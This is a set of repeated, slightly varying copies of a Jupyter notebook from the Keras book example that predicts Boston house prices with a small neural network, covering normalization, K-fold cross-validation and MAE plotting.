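# One predicted price (in thousands of dollars) per input row.
predicted_prices = model.predict(test_data)
###Output
_____no_output_____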
###Markdown
Predicting house prices: a regression example

This notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.

----

In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label for an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.

Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm.

The Boston Housing Price dataset

We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.

The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1; others take values between 1 and 12; others between 0 and 100...

Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features, as follows:

1. Per capita crime rate.
2. Proportion of residential land zoned for lots over 25,000 square feet.
3. Proportion of non-retail business acres per town.
4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).
5. Nitric oxides concentration (parts per 10 million).
6. Average number of rooms per dwelling.
7. Proportion of owner-occupied units built prior to 1940.
8. Weighted distances to five Boston employment centres.
9. Index of accessibility to radial highways.
10. Full-value property-tax rate per $10,000.
11. Pupil-teacher ratio by town.
12. 1000 * (Bk - 0.63) ** 2, where Bk is the proportion of Black people by town.
13. % lower status of the population.

The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted.

Preparing the data

It would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
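###Markdown
The same feature-wise standardization can be expressed with scikit-learn's `StandardScaler`, which makes it harder to accidentally leak test-set statistics. An equivalent sketch intended for the raw (pre-normalization) arrays, assuming scikit-learn is installed; not part of the original notebook:
###Code
from sklearn.preprocessing import StandardScaler
# Fit on the training data only, then apply the same transform to the test data.
scaler = StandardScaler()
train_data_scaled = scaler.fit_transform(train_data)
test_data_scaled = scaler.transform(test_data)
###Output
_____no_output_____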
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization.

Building our network

Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
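###Markdown
To sanity-check the architecture (layer output shapes and parameter counts), you can print a summary of a freshly built model; a small optional sketch, not part of the original notebook:
###Code
# Builds a throwaway instance just to inspect the layer table it prints.
build_model().summary()
###Output
_____no_output_____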
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training: the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.

The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
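###Markdown
The fold-to-fold spread of these scores can also be quantified directly; a one-line optional sketch, not part of the original notebook:
###Code
# Standard deviation of the per-fold MAE scores: a rough measure of how much
# the validation score depends on the particular split.
np.std(all_scores)
###Output
_____no_output_____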
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
('processing fold #', 0)
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.

Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression example

This notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.

----

In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label for an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.

Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm.

The Boston Housing Price dataset

We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.

The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1; others take values between 1 and 12; others between 0 and 100...

Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features, as follows:

1. Per capita crime rate.
2. Proportion of residential land zoned for lots over 25,000 square feet.
3. Proportion of non-retail business acres per town.
4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).
5. Nitric oxides concentration (parts per 10 million).
6. Average number of rooms per dwelling.
7. Proportion of owner-occupied units built prior to 1940.
8. Weighted distances to five Boston employment centres.
9. Index of accessibility to radial highways.
10. Full-value property-tax rate per $10,000.
11. Pupil-teacher ratio by town.
12. 1000 * (Bk - 0.63) ** 2, where Bk is the proportion of Black people by town.
13. % lower status of the population.

The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted.

Preparing the data

It would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization.

Building our network

Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
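###Markdown
The `mse` loss and `mae` metric passed to `compile` above can be written out by hand; a minimal NumPy sketch with illustrative function names, not part of the original notebook:
###Code
import numpy as np
def mse_metric(y_true, y_pred):
    # mean of squared differences between predictions and targets
    return np.mean((np.asarray(y_true) - np.asarray(y_pred)) ** 2)
def mae_metric(y_true, y_pred):
    # mean of absolute differences between predictions and targets
    return np.mean(np.abs(np.asarray(y_true) - np.asarray(y_pred)))
###Output
_____no_output_____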
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training: the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.

The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.

Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression example

This notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.

----

In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label for an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.

Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm.

The Boston Housing Price dataset

We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.

The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1; others take values between 1 and 12; others between 0 and 100...

Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features, as follows:

1. Per capita crime rate.
2. Proportion of residential land zoned for lots over 25,000 square feet.
3. Proportion of non-retail business acres per town.
4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).
5. Nitric oxides concentration (parts per 10 million).
6. Average number of rooms per dwelling.
7. Proportion of owner-occupied units built prior to 1940.
8. Weighted distances to five Boston employment centres.
9. Index of accessibility to radial highways.
10. Full-value property-tax rate per $10,000.
11. Pupil-teacher ratio by town.
12. 1000 * (Bk - 0.63) ** 2, where Bk is the proportion of Black people by town.
13. % lower status of the population.

The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
#train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted.

Preparing the data

It would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization.

Building our network

Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, an MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average.

Validating our approach using K-fold validation

To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (about 100 examples). As a consequence, our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training: the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.

The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model is then the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:

* Omit the first 10 data points, which are on a different scale from the rest of the curve.
* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.

Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression example

This notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.

----

In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label for an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.

Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm.

The Boston Housing Price dataset

We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.

The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance, some values are proportions, which take values between 0 and 1; others take values between 1 and 12; others between 0 and 100...

Let's take a look at the data:
###Code
import numpy as np
# save np.load
np_load_old = np.load
# modify the default parameters of np.load
np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
# restore np.load for future normal usage
np.load = np_load_old
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features, as follows:

1. Per capita crime rate.
2. Proportion of residential land zoned for lots over 25,000 square feet.
3. Proportion of non-retail business acres per town.
4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).
5. Nitric oxides concentration (parts per 10 million).
6. Average number of rooms per dwelling.
7. Proportion of owner-occupied units built prior to 1940.
8. Weighted distances to five Boston employment centres.
9. Index of accessibility to radial highways.
10. Full-value property-tax rate per $10,000.
11. Pupil-teacher ratio by town.
12. 1000 * (Bk - 0.63) ** 2, where Bk is the proportion of Black people by town.
13. % lower status of the population.

The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted.

Preparing the data

It would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization.

Building our network

Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit and no activation (i.e. it will be a linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance, if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.

Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.

